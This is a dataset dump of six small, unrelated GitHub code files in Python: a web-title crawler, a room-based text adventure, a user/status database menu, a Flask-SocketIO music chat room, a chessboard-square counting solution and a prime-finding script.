+{"seq_id":"36117246368","text":"# a simple web crawler to crawel MYEGY main pages\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nusrInput = int(input('Enter How many pages you like to crawl: '))\n\n\ndef wordList(maxPage):\n page = 1\n with open('site_content.txt', 'w') as content:\n\n while page <= maxPage:\n url = 'http://myegy.tv/?page=' + str(page)\n source = requests.get(url).text\n soup = BeautifulSoup(source, 'lxml')\n currentPage = '=========The Current Page is => ' + str(page) + '========='\n content.write(currentPage) # writes where you are before each page\n content.write('\\n')\n\n for text in soup.findAll('span', {'class': 'title'}):\n txt = text.string # grabs only the string from the html code\n content.write('\\n')\n\n for w in txt:\n content.write(w)\n content.write('\\n')\n content.write('\\n')\n page += 1\n content.close()\n\n\nwordList(usrInput)\n","repo_name":"cloud01001/egyCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17697076012","text":"#Author: Navjeet Hundal\n#Version 1.0\n\n\n#This program is a text based game that you go between rooms and doors to find a way out.\n#Limitation: can only accept intergers from the user\n#Features: (1) Entrance room with three differnt options\n#(2) Kitchen where you can change the state of the lever\n#(3) Pantry where you can change the state of the dial\n#(4) Living room where you can go to to other rooms and pick up a string, view the soil\n#(5) Attic where you can pick up cheese and drop the string into a hole\n#(6) Bedroom where you can try to interact with a tomcat or feed a mouse\n\n\n#Creating contants \nOPTION_1 = 1\nOPTION_2 = 2\nOPTION_3 = 3\nOPTION_4 = 4\n\n\n#Creating a function that tells the entrance room's description\n#EntranceInfo(no parameters)\ndef EntranceInfo(Dial,Lever):\n print(\"\"\"Room: Entrance Room\n-------------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the entrance hallway.There is a mysterious door infront\nof you that that is sending out an unusual aura thats calling to you.To your\nleft is an entranceway into the pantry.To your right is an entranceway into\nthe kitchen.\"\"\",\"\\n\")\n\n print(\"The dial is currently set to\",Dial)\n print(\"The lever is currently set to\",Lever)\n print(\"Type '1' to try to open door\")\n print(\"Type '2' to go through the left entryway\")\n print(\"Type '3' to go through the right entryway\")\n\n\n#Creating a function that checks users input\n#EntranceInputCheck(int)\ndef EntranceInputCheck(Entrance_room_option,Dial,Lever):\n\n#Input check if user input is between 1-3 if not ask again\n if (Entrance_room_option > OPTION_3 or Entrance_room_option < OPTION_1):\n while (Entrance_room_option > OPTION_3 or Entrance_room_option < OPTION_1):\n print(\"\\n\")\n print(\"That option doesnt exist please choose from options 1-3\")\n EntranceInfo(Dial,Lever)\n Entrance_room_option = int(input(\"What would you like to do?\"))\n return Entrance_room_option #Return entrance_room_option to EntranceRoom\n\n\n#Creating a function that makes the entrance room \n#EntranceRoom(str,str)\ndef EntranceRoom(Dial,Lever):\n Entrance = True\n while (Entrance == True):\n EntranceInfo(Dial,Lever)\n Entrance_room_option = int(input(\"What would you like to do?\"))\n Entrance_room_option = EntranceInputCheck(Entrance_room_option,Dial,Lever)\n print(\"\\n\")\n\n#If user picks option 1 but the dial and lever are not set to the right position then tell them its locked\n if (Entrance_room_option == OPTION_1 and (Dial != \"red\" or Lever != \"back\")):\n print(\"That door is locked, try to find a way to open it\")\n \n# Opening the door if player has pressed all the correct buttons and ending the game\n if (Entrance_room_option == OPTION_1 and Dial == \"red\" and Lever == \"back\"):\n print(\"\"\"The door has been opened and pulled you in, as you look behind you it vanishes\ninto thin air\"\"\")\n Entrance = False #To break out of main loop \n\n# If player picked option 2 in entrance room take them to pantry \n if (Entrance_room_option == OPTION_2):\n Dial = Pantry(Dial,Lever)\n\n#If player picked option 3 take them to the kitchen\n if (Entrance_room_option == OPTION_3):\n Lever = Kitchen(Dial,Lever)\n\n\n#Creating a function that tells the pantry's description\n#PantryInfo(str)\ndef PantryInfo(Dial):\n print(\"\"\"Room: Pantry\n------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the pantry, you can smell the aroma of delicious foods.\nIn front of you is a dial with 3 different settings: blue, red and 
green.\nBehind you is the doorway back to the entrance room.\"\"\",\"\\n\")\n\n# Telling players options for pantry \n print(\"The dial is currently set to\",Dial) # Telling which dial is active\n print(\"Type '1' to turn the dial to blue\")\n print(\"Type '2' to turn the dial to red\")\n print(\"Type '3' to turn the dial to green\")\n print(\"Type '4' don't touch that dial! Return to entrance room\")\n \n\n#Creating a function that checks pantry input\n#PantryInputCheck(int,str)\ndef PantryInputCheck(Pantry_option,Dial):\n\n#Input check if user input is between 1-4 if not ask again\n if (Pantry_option < OPTION_1 or Pantry_option > OPTION_4):\n while (Pantry_option < OPTION_1 or Pantry_option > OPTION_4): # if input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-4\")\n PantryInfo(Dial)\n Pantry_option = int(input(\"What would you like to do?\"))\n \n return Pantry_option #Return Pantry_option to Pantry\n \n\n#Creating a function that changes the dial\n#Pantry(str,str)\ndef Pantry(Dial,Lever):\n while True:\n PantryInfo(Dial)\n Pantry_option = int(input(\"What would you like to do?\"))\n Pantry_option = PantryInputCheck(Pantry_option,Dial)\n print(\"\\n\")\n \n # Changing the dial to 'blue' if they picked option 1\n if (Pantry_option == OPTION_1):\n Dial = \"blue\"\n \n # Changing the dial to 'red' if they picked option 2\n if (Pantry_option == OPTION_2):\n Dial = \"red\"\n\n # Changing the dial to 'green' if they picked option 3\n if (Pantry_option == OPTION_3):\n Dial = \"green\"\n\n # If player choses option 4 break out of this loop and go back to entrance room\n if (Pantry_option == OPTION_4):\n print(\"\\n\")\n return Dial #Return Dial to EntranceRoom\n\n\n#Creating a function that tells the kitchens description\n#KitchenInfo(str)\ndef KitchenInfo(Lever):\n\n# Letting the players know their current room and giving a description of the room\n print(\"\"\"Room: Kitchen\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the kitcken, you see many appliances around you.\nIn front of you is a lever that can be pushed into a forward position or pulled\nin the backward position.Behind you is the doorway back to the entrance room.\"\"\",\"\\n\")\n\n# Telling players the options for the kitchen \n print(\"The lever is currently set to\",Lever) # Telling which lever is active\n print(\"Type '1' to pull lever to the 'back' position\")\n print(\"Type '2' to push the lever to the 'forward' positon\")\n print(\"Type '3' don't touch the lever and return to entrance room\")\n\n\n#Creating a function that checks input for the kitchen\n#KitchenInputCheck(int,str)\ndef KitchenInputCheck(Kitchen_option,Lever):\n\n#Input check if user input is between 1-3 if not ask again\n if (Kitchen_option < OPTION_1 or Kitchen_option > OPTION_3):\n while (Kitchen_option < OPTION_1 or Kitchen_option > OPTION_3): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-3\")\n KitchenInfo(Lever)\n Kitchen_option = int(input(\"what would you like to do?\"))\n return Kitchen_option #Return Kitchen_option to Kitchen\n\n\n#Creating a function that changes the state of the lever\n#Kitchen(str,str)\ndef Kitchen(Dial,Lever):\n while True:\n KitchenInfo(Lever)\n Kitchen_option = int(input(\"what would you like to do?\"))\n Kitchen_option = KitchenInputCheck(Kitchen_option,Lever)\n print(\"\\n\")\n\n # Changing the lever to 'back' if they picked option 1\n if (Kitchen_option == OPTION_1):\n Lever = 
\"back\"\n \n # Changing the lever to 'forward' if they picked option 2\n if (Kitchen_option == OPTION_2):\n Lever = \"forward\"\n\n\n # Going back to main entrance if they picked option 3\n if (Kitchen_option == OPTION_3):\n print(\"\\n\")\n return Lever #Return Lever to EntranceRoom \n \n\n#Creating a function that tells the description of the living room\n#LivingRoomInfo(str,str)\ndef LivingRoomInfo(String,Cheese):\n print(\"\"\"Room: Living Room\n-----------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the living room in front of you is a pot of soil\nand a dark entranceway that leads to the bedroom.Towards your right there are\nstairs leading up to the attic.\"\"\",\"\\n\")\n\n print(\"The string is currently\",String)\n print(\"The cheese is currently\",Cheese)\n print(\"Type '1' to view the pot of soil\")\n print(\"Type '2' to take the stairs up leading to the next floor\")\n print(\"Type '3' to go through the dark entrance way\")\n if (String == \"not in your inventory\"): # only show when player doesnt have string\n print(\"Type '4' to pick up the ball of string on the floor\")\n\n\n#Creating a function that checks living room input\n#LivingRoomInputCheck(int,str,str,str)\ndef LivingRoomInputCheck(Living_room_option,String,Cheese,Mouse):\n\n#Input check if string is not in your inventory user can only input 1-4 if not ask again\n if (String == \"not in your inventory\"): \n while (Living_room_option > OPTION_4 or Living_room_option < OPTION_1):\n print(\"\\n\")\n print(\"That option doesnt exist please choose from options 1-4\",\"\\n\")\n LivingRoomInfo(String,Cheese)\n Living_room_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is gone or in your inventory user can only input 1-3 if not ask again \n if (String != \"not in your inventory\"):\n while (Living_room_option > OPTION_3 or Living_room_option < OPTION_1):\n print(\"\\n\")\n print(\"That option doesnt exist please choose from options 1-3\",\"\\n\")\n LivingRoomInfo(String,Cheese)\n Living_room_option = int(input(\"What would you like to do?\"))\n \n return Living_room_option # return user input to living room\n \n\n#Creating a function that makes the living room\n#LivingRoom(str,str,str)\ndef LivingRoom(String,Cheese,Mouse):\n Living_room = True\n Soil = \"not fertilized\"\n while (Living_room == True):\n LivingRoomInfo(String,Cheese)\n Living_room_option = int(input(\"What would you like to do?\"))\n Living_room_option = LivingRoomInputCheck(Living_room_option,String,Cheese,Mouse)\n print(\"\\n\")\n\n#If mouse is gone then the soil is fertilized and he goes back to the bedroom\n if (Mouse == \"gone\"):\n Soil = \"fertilized\"\n Mouse = \"out\"\n\n#If user input is 1 and the soil hasnt been fertilized by the mouse then view the soil \n if (Living_room_option == OPTION_1 and Soil != \"fertilized\"):\n print(\"The pot of soil looks dry\")\n\n#If user input is 1 and the mouse has fertilized the soil end game\n if (Living_room_option == OPTION_1 and Soil == \"fertilized\"):\n print(\"\"\"The soil has been fertilized and creates a giant vine that takes you\ninto the sky!\"\"\")\n Living_room = False #Ending the game by breaking out of the loop\n\n#If user input is 2 then go to the attic\n if (Living_room_option == OPTION_2):\n String, Cheese, Mouse = Attic(String,Cheese,Mouse)\n\n#If user input is 3 then go into the bedroom\n if (Living_room_option == OPTION_3):\n String, Cheese, Mouse = Bedroom(String,Cheese,Mouse)\n\n#If user input is 4 pick up the string \n if (Living_room_option == 
OPTION_4):\n String = \"in your inventory\"\n\n\n#Creating a function that tells the attic's description\n#AtticInfo(str,str)\ndef AtticInfo(String,Cheese):\n print(\"\"\"Room: Attic\n-----------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the attic to your left there is a small hole.To your right\nthere is a table with so much cheese on it.Behind you is a staircase back down\nto the living room\"\"\",\"\\n\")\n\n print(\"The string is currently\",String)\n print(\"The cheese is currently\",Cheese)\n print(\"Type '1' to go back to the living room \")\n print(\"Type '2' to pick up the cheese from the table\")\n if (Cheese == \"in your inventory\"): #If cheese is in inventory then give option 3\n print(\"Type '3' to drop the cheese down the hole\")\n if (String == \"in your inventory\"): #If string is in inventory then give option 4\n print(\"Type '4' to drop the string down the hole\")\n\n\n#Creating a function that checks input for the attic\n#AtticInputCheck(int,str,str,str)\ndef AtticInputCheck(Attic_option,String,Cheese,Mouse):\n\n#Input check if you dont have string but have cheese user can only input 1-3 if not ask again\n if (String != \"in your inventory\" and Cheese == \"in your inventory\"):\n while (Attic_option < OPTION_1 or Attic_option > OPTION_3): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-3\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is in your inventory and cheese is not user can only input 1-2 or 4 if not ask again \n if (String == \"in your inventory\" and Cheese == \"not in your inventory\"):\n while ((Attic_option < OPTION_1 or Attic_option > OPTION_2) and Attic_option != OPTION_4): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-2 or 4\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is in your inventory and cheese is too user can only input 1-4 if not ask again \n if (String == \"in your inventory\" and Cheese == \"in your inventory\"):\n while (Attic_option < OPTION_1 or Attic_option > OPTION_4): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-4\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is not in your inventory and no cheese user can only input 1-2 if not ask again \n if (String != \"in your inventory\" and Cheese == \"not in your inventory\"):\n while (Attic_option < OPTION_1 or Attic_option > OPTION_2): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-2\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n return Attic_option # return Attic_option to living room\n\n\n#Creating a function that makes the attic\n#Attic(str,str,str)\ndef Attic(String,Cheese,Mouse):\n while True:\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n Attic_option = AtticInputCheck(Attic_option,String,Cheese,Mouse)\n print(\"\\n\")\n\n#If user input is 1 go back to the living room\n if (Attic_option == OPTION_1):\n print(\"\\n\")\n return String, Cheese, Mouse; # using a tuple to return three values to Living Room\n\n#If user input is 2 pick up the cheese \n if (Attic_option == OPTION_2):\n print(\"You picked up the cheese\")\n 
Cheese = \"in your inventory\"\n\n#If user input is 3 try to drop cheese into the hole \n if (Attic_option == OPTION_3):\n print(\"The cheese is too big\")\n\n#If user input is 4 drop the string down the hole \n if (Attic_option == OPTION_4):\n print(\"You dropped the string down the hole\")\n String = \"gone\"\n Mouse = \"out\"\n\n\n#Creating a function that tells the bedroom description\n#BedroomInfo(str,str,str)\ndef BedroomInfo(String,Cheese,Mouse):\n\n#If mouse is hiding giving description of the bedroom\n if (Mouse == \"hiding\"):\n print(\"\"\"Room: Bedroom\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the bedroom in front of you is a small hole next to the\nbed with a mouse hiding in it and a tomcat watching the hole trying to get\nthe mouse.Behind you is a dark entranceway back to the living room.\"\"\",\"\\n\")\n\n#If mouse is out giving a description of the bedroom\n if (Mouse == \"out\"):\n print(\"\"\"Room: Bedroom\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the bedroom in front of you is a small hole next to the bed\nand next to it is a mouse wondering in the room.Behind you is a dark entranceway\nback to the living room.\"\"\",\"\\n\")\n\n#If mouse is gone giving a desscription of the bedroom\n if (Mouse == \"gone\"):\n print(\"\"\"Room: Bedroom\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the bedroom in front of you is a small hole next to the bed.\nIt seems like the mouse has wondered off somewhere.Behind you is a dark\nentranceway back to the living room.\"\"\",\"\\n\")\n\n print(\"The string is currently\",String)\n print(\"The cheese is currently\",Cheese)\n print(\"The mouse is currently\",Mouse)\n print(\"Type '1' to go back to the living room \")\n if (String == \"in your inventory\"): #If string is in your inventory give option 2\n print(\"Type '2' to use the string to play with the cat\")\n if (Cheese == \"in your inventory\") and (Mouse == \"out\"): #If cheese in your inventory and mouse out give option 3\n print(\"Type '3' to feed the mouse the cheese\")\n\n\n#Creating a function that checks the bedroom input\n#BedroomInputCheck(int,str,str,str)\ndef BedroomInputCheck(Bedroom_option,String,Cheese,Mouse):\n\n#Input check if string is not in your inventory user can only input 1 if not then ask again\n if (String == \"not in your inventory\" and Cheese == \"in your inventory\") or (String == \"not in your inventory\" and Cheese == \"not in your inventory\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option > OPTION_1): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-1\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is gone and cheese is not in your inventory user can only input 1 if not ask again\n if (String == \"gone\" and Cheese == \"not in your inventory\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option > OPTION_1): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-1\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is in your inventory user can only input 1-2 if not then ask again \n if (String == \"in your inventory\" and Cheese == \"in your inventory\") or (String == \"in your inventory\" and Cheese == \"not in your inventory\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option > OPTION_2): # If input is 
not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-2\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is gone and cheese in inventory user can only input 1 or 3 if not then ask again\n if (String == \"gone\" and Cheese == \"in your inventory\" and Mouse == \"out\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option >= OPTION_2 and Bedroom_option != OPTION_3):\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1 or 3\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n return Bedroom_option #Return user input to Bedroom \n\n\n#Creating a function that makes the bedroom\n#Bedroom(str,str,str)\ndef Bedroom(String,Cheese,Mouse):\n while True:\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n Bedroom_option = BedroomInputCheck(Bedroom_option,String,Cheese,Mouse)\n print(\"\\n\")\n\n#If user input is 1 go back to living room \n if (Bedroom_option == OPTION_1):\n print(\"\\n\")\n return String, Cheese , Mouse; # using a tuple to return two values\n\n#If user input is 2 try to distract the cat \n if (Bedroom_option == OPTION_2):\n print(\"The cat looks at you briefly then goes back to watching the hole\")\n\n#If user input is 3 feed the mouse \n if (Bedroom_option == OPTION_3):\n print(\"You fed the cheese to the mouse and he wondered off somewhere\")\n Mouse = \"gone\"\n Cheese = \"not in your inventory\"\n \n\n#Creating the start function\n#start(no parameter)\ndef start():\n Dial = \"nothing\"\n Lever = \"nothing\"\n String = \"not in your inventory\"\n Cheese = \"not in your inventory\"\n Mouse = \"hiding\"\n print(\"The door that brought you to this house has disappeared, find another way out!\")\n EntranceRoom(Dial,Lever)\n LivingRoom(String,Cheese,Mouse)\n\n#calling the start function\nstart()\n","repo_name":"navjeethundal/TextAdventureGame","sub_path":"TextAdventureGame.py","file_name":"TextAdventureGame.py","file_ext":"py","file_size_in_byte":20739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25340509315","text":"\"\"\"\nProvides a basic frontend\n\"\"\"\nimport sys\nimport main\n\nfrom loguru import logger\n\nlogger.remove()\nlogger.add('loguru_file_{time:YYYY-MM-DD}.log', level='DEBUG')\nlogger.add(sys.stderr, level='WARNING')\n\n\ndef load_accounts_csv_to_db(uc_instance):\n \"\"\"\n Loads user accounts from a file\n \"\"\"\n filename = input('Enter filename of user file: ')\n main.load_accounts_csv_to_db(filename, uc_instance)\n\n\ndef load_status_csv_to_db(sc_instance):\n \"\"\"\n Loads status updates from a file\n \"\"\"\n filename = input('Enter filename for status file: ')\n main.load_status_csv_to_db(filename, sc_instance)\n\n\ndef add_user(uc_instance):\n \"\"\"\n Adds a new user into the database\n \"\"\"\n user_id = input('User ID: ')\n email = input('User email: ')\n user_name = input('User name: ')\n user_last_name = input('User last name: ')\n logger.info(f\"Calling add_user with user_id\")\n logger.debug(f\"add_user parameter user_id: {user_id}\")\n if not main.add_user(user_id,\n email,\n user_name,\n user_last_name,\n uc_instance):\n logger.error(\"An error occurred while trying to add new user\")\n print(\"An error occurred while trying to add new user\")\n else:\n logger.debug(\"User was successfully added\")\n print(\"User was successfully added\")\n\n\ndef delete_user(uc_instance):\n \"\"\"\n Deletes user from the database\n \"\"\"\n user_id = input(\"Enter the user_id of the user to delete: \")\n if not main.delete_user(user_id, uc_instance):\n logger.debug(f'{user_id} does not exist')\n print(f\"Failed to remove {user_id}. Does not exist!\")\n else:\n logger.debug(f'{user_id} deleted')\n print(f\"Removed {user_id}\")\n\n\ndef search_user(uc_instance):\n \"\"\"\n Searches a user in the database\n \"\"\"\n user_id = input('Enter user ID to search: ')\n result = main.search_user(user_id, uc_instance)\n logger.debug(result)\n if result is None:\n logger.error(\"ERROR: User does not exist\")\n print(\"ERROR: User does not exist\")\n else:\n logger.debug(f\"User ID: {result.user_id}\")\n print(f\"User ID: {result.user_id}\")\n logger.debug(f\"Email: {result.email}\")\n print(f\"Email: {result.email}\")\n logger.debug(f\"Name: {result.user_name}\")\n print(f\"Name: {result.user_name}\")\n logger.debug(f\"Last name: {result.user_last_name}\")\n print(f\"Last name: {result.user_last_name}\")\n\n\ndef update_email(uc_instance):\n \"\"\"\n Updates information for an existing user\n \"\"\"\n user_id = input(\"Enter the user_id of the user whose information you wish to update: \")\n email = input(\"Enter their new email address: \")\n if not main.update_email(user_id, email, uc_instance):\n logger.error(\"An error occurred while trying to update user email\")\n print(f\"Failed to update to {email}\")\n else:\n logger.debug(\"User email was successfully updated\")\n print(f\"{user_id}'s new email is now {email}\")\n\n\ndef add_status(sc_instance):\n \"\"\"\n Adds a new status into the database\n \"\"\"\n user_id = input('User ID: ')\n status_id = input('Status ID: ')\n status_text = input('Status text: ')\n if not main.add_status(status_id, user_id, status_text, sc_instance):\n logger.error(\"An error occurred while trying to add new status\")\n print(\"An error occurred while trying to add new status\")\n else:\n logger.debug(\"New status was successfully added\")\n print(\"New status was successfully added\")\n\n\ndef delete_status(sc_instance):\n \"\"\"\n Deletes status from the database\n \"\"\"\n status_id = input(\"Enter the status_id of the status to 
delete: \")\n if not main.delete_status(status_id, sc_instance):\n logger.error(\"An error occurred while trying to delete status\")\n print(\"An error occurred while trying to delete status\")\n else:\n logger.debug(\"Status was successfully deleted\")\n print(\"Status was successfully deleted\")\n\n\ndef search_status(sc_instance):\n \"\"\"\n Searches a status in the database\n \"\"\"\n status_id = input(\"Enter a status_id to search for status: \")\n status = main.search_status(status_id, sc_instance)\n if status is not None:\n # return status.status_id, status.user_id, status.status_text\n print(\n f\"{status.status_id} from {status.user_id} has status(es): {status.status_text}.\"\n )\n else:\n logger.error(\"ERROR: Status does not exist\")\n print(f\"{status_id} was not found\")\n\n\ndef update_status(sc_instance):\n \"\"\"\n Updates information for an existing status\n \"\"\"\n status_id = input(\"Enter the status_id of the status you wish to update: \")\n status_text = input(\"Enter a new status text: \")\n result = main.update_status(status_id, status_text, sc_instance)\n if result:\n print(f\"{status_id}'s new status is now {status_text}\")\n logger.error(\"An error occurred while trying to update status\")\n else:\n print(f\"Failed to update to {status_id}\")\n logger.debug(\"Status was successfully updated\")\n\n\ndef quit_program():\n \"\"\"\n Quits program\n \"\"\"\n sys.exit()\n\n\nif __name__ == \"__main__\":\n user_collection_instance = main.init_user_collection()\n status_collection_instance = main.init_status_collection()\n while True:\n user_input = input(\n '1. Add user\\n2. Search user\\n3. Delete user\\n4. Update email\\n'\n '5. Add status\\n6. Search status\\n7. Delete status\\n8. Update status text\\n'\n '9. Load user data to database\\n10. Load status data to database\\n11. Exit\\nEnter option: ')\n if user_input == \"1\":\n add_user(user_collection_instance)\n elif user_input == \"2\":\n search_user(user_collection_instance)\n elif user_input == \"3\":\n delete_user(user_collection_instance)\n elif user_input == \"4\":\n update_email(user_collection_instance)\n elif user_input == \"5\":\n add_status(status_collection_instance)\n elif user_input == \"6\":\n search_status(status_collection_instance)\n elif user_input == \"7\":\n delete_status(status_collection_instance)\n elif user_input == \"8\":\n update_status(status_collection_instance)\n elif user_input == \"9\":\n load_accounts_csv_to_db( user_collection_instance)\n elif user_input == \"10\":\n load_status_csv_to_db(status_collection_instance)\n elif user_input == \"11\":\n sys.exit(0)\n else:\n print(\"Did not understand input\")","repo_name":"audreyle/social-network-backend-sqlite","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73226839899","text":"from flask_cors import CORS\nfrom flask import Flask, render_template, request, redirect, url_for, session\nfrom flask_socketio import SocketIO, join_room, leave_room, emit\nimport os\n\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nfrom pathlib import Path # Python 3.6+ only\n\nenv_path = Path('.') / '.env'\nload_dotenv(dotenv_path=env_path)\n\napp = Flask(__name__)\nsocket = SocketIO(app, manage_session=False, cors_allowed_origins=\"*\")\napp.debug = True\n\napp.config['SECRET_KEY'] = 'secret'\nCORS(app)\n\n\n@app.route(\"/\")\ndef index():\n if 'username' in session:\n return redirect(url_for(\"chat\"))\n return render_template(\"index.html\")\n\n\n@app.route(\"/chat\", methods=['GET', 'POST'])\ndef chat():\n if request.method == 'POST':\n username, room = request.form[\"username\"], request.form[\"room\"]\n session[\"username\"] = username\n session[\"room\"] = room\n return render_template(\"chat.html\", session=session, clientID=str(os.getenv('CLIENT_ID')))\n else:\n # check if user login\n if \"username\" in session:\n return render_template(\"chat.html\", session=session)\n else:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/leave\", methods=['GET', 'POST'])\ndef leave():\n session.clear()\n return redirect(url_for(\"index\"))\n\n\n@socket.on('join', namespace='/chat')\ndef join(message):\n name = session['username']\n room = session['room']\n time = datetime.now()\n\n join_room(room)\n emit('status', {\"username\": name, \"content\": \"has joined\", \"time\": parseTime(time)}, room=room)\n\n\n@socket.on('message', namespace='/chat')\ndef send_msg(message):\n name = session['username']\n room = session['room']\n time = datetime.now()\n content = message['content']\n\n if content == \"\":\n return\n # broadcast to everyone in the room of new message\n emit('message', {\"username\": name, \"content\": content, \"time\": parseTime(time)}, room=room)\n\n\n@socket.on('leave', namespace='/chat')\ndef leave(message):\n room = session['room']\n name = session['username']\n time = datetime.now()\n\n # cannot clear session here. dk why\n leave_room(room)\n emit('status', {\"username\": name, \"content\": \"has left\", \"time\": parseTime(time)}, room=room)\n\n\n@socket.on('play_music', namespace='/chat')\ndef play_music(info):\n room = session['room']\n name = session['username']\n print(\"broadcast music\")\n emit('play_music', {\"id\" : info['id']}, room=room)\n\n content = f\"'s just played {info['track_name']}\"\n time = datetime.now()\n\n emit('status', {\"username\": name, \"content\": content, \"time\": parseTime(time)}, room=room)\n\n\ndef parseTime(obj):\n obj = str(obj)\n date = obj.split(\" \")[0]\n time = \":\".join(obj.split(\" \")[-1].split(\":\")[:-1])\n return f\"{time} {date}\"\n\n\nif __name__ == '__main__':\n socket.run(app, host='0.0.0.0')\n","repo_name":"leminhviett/Music-Chat-App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28854542391","text":"\"\"\"\nFile name: 1100.py\nAuthor: 정지운\nDate: June 18, 2017\nPurpose: Prints how many pieces sit on the white squares of a chessboard.\n\"\"\"\n\n# input\ninputLst = []\nfor i in range(8):\n\tinputLst.append(input())\n\n# computation\nnum = 0\nfor i in range(len(inputLst)):\n\tfor j in range(len(inputLst[i])):\n\t\t# a square is white exactly when the sum of its indices is even\n\t\tif ((i + j) % 2 == 0) and inputLst[i][j] == 'F':\n\t\t\tnum += 1\n\n# print the result\nprint(num)","repo_name":"programmer-k/Baekjoon-Online-Judge-Submission","sub_path":"1100.py","file_name":"1100.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
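A quick self-contained check of the parity rule used above, on a made-up two-row board (rows and columns indexed from 0, so a square is white exactly when row + col is even):

board = [
    "F.F.....",   # 'F' at columns 0 and 2: both (0+col) even -> white
    ".F......",   # 'F' at column 1: (1+1) even -> white
]
white_pieces = sum(
    1
    for i, row in enumerate(board)
    for j, ch in enumerate(row)
    if (i + j) % 2 == 0 and ch == "F"
)
assert white_pieces == 3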
+{"seq_id":"13366251380","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 14 17:48:24 2022\r\n\r\n@author: Goran\r\n\"\"\"\r\nimport math\r\nimport random\r\n\r\ndef input_an_integer():\r\n    return int(input('Please input an integer:'))\r\n\r\ndef test_if_prime(x):\r\n\r\n    if x < 2:\r\n        return False\r\n    elif x < 4:\r\n        # 2 and 3 are prime\r\n        return True\r\n    elif x % 2 == 0:\r\n        return False\r\n    else:\r\n        # a composite x has a prime factor no greater than sqrt(x)\r\n        for i in range(3, math.isqrt(x) + 1, 2):\r\n            if x % i == 0:\r\n                return False\r\n\r\n    return True\r\n\r\nlist_size = int(input('How long is the list of integers\\n'))\r\n\r\nlist_min = int(input('What is the smallest possible random integer?\\n'))\r\nlist_max = int(input('What is the largest possible random integer?\\n'))\r\n\r\na = [random.randint(list_min, list_max) for _ in range(list_size)]\r\n\r\nprint('We have generated the following list:\\n', a, '\\n')\r\n\r\nprimes = {x for x in a if test_if_prime(x)}\r\n\r\nprint('The following numbers of this list are primes:\\n', sorted(primes))\r\n","repo_name":"GoranSimatovic/Python-lookup","sub_path":"test_list_for_primes.py","file_name":"test_list_for_primes.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
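A small standalone sanity check for the sqrt-bounded trial division above (assumes the corrected `test_if_prime` shown in that record):

assert [x for x in range(2, 30) if test_if_prime(x)] == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
# 0, 1 and negatives are not prime; 9, 15 and 25 exercise the odd-divisor loop
assert not any(test_if_prime(x) for x in (0, 1, -7, 9, 15, 25))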
